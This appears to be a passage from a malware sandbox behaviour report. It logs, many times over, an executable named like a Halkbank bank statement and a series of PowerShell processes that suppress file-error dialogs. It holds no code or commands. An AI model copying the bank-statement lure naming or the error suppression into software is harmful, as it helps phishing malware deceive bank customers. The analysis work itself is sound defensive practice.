Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
